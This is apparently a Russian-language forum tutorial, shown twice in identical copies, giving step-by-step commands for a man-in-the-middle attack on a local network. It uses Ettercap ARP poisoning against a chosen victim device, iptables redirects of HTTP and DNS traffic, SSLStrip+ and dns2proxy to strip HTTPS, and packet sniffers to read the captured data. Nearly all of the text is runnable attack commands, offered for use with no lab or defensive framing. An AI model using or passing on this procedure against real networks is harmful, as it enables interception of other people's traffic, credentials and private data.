- 29
- 102
- 18 Май 2017
Переведем нашу машину в режим пересылки:
echo "1" > /proc/sys/net/ipv4/ip_forward
Запускаем Ettercap в графическом интерфейсе:
ettercap -G
В меню выбираем Sniff, далее Unified, выбираем желаемый интерфейс:
Теперь выбираем Hosts, в нём подпункт Scan for hosts. После окончания сканирования выберите Hosts list:
В качестве Цели1 выберите роутер (Add to Target 1), в качестве Цели2 выберите устройство, которое будете атаковать (Add to Target 2).
Теперь настройте iptables для редиректа HTTP трафика:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 3001
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
Скачиваем и запускаем SSLStrip+.
git clone https://github.com/singe/sslstrip2.git
cd sslstrip2/
python2 ./sslstrip.py -f -k -l 3001
Скачиваем и запускаем dns2proxy:
git clone https://github.com/singe/dns2proxy.git
cd dns2proxy/
python2 dns2proxy.py
Для анализа данных запускаем любую удобную вам программу:
Wireshark.
Driftnet
Bettercap
и т.д
echo "1" > /proc/sys/net/ipv4/ip_forward
Запускаем Ettercap в графическом интерфейсе:
ettercap -G
В меню выбираем Sniff, далее Unified, выбираем желаемый интерфейс:
Теперь выбираем Hosts, в нём подпункт Scan for hosts. После окончания сканирования выберите Hosts list:
В качестве Цели1 выберите роутер (Add to Target 1), в качестве Цели2 выберите устройство, которое будете атаковать (Add to Target 2).
Теперь настройте iptables для редиректа HTTP трафика:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 3001
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
Скачиваем и запускаем SSLStrip+.
git clone https://github.com/singe/sslstrip2.git
cd sslstrip2/
python2 ./sslstrip.py -f -k -l 3001
Скачиваем и запускаем dns2proxy:
git clone https://github.com/singe/dns2proxy.git
cd dns2proxy/
python2 dns2proxy.py
Для анализа данных запускаем любую удобную вам программу:
Wireshark.
Driftnet
Bettercap
и т.д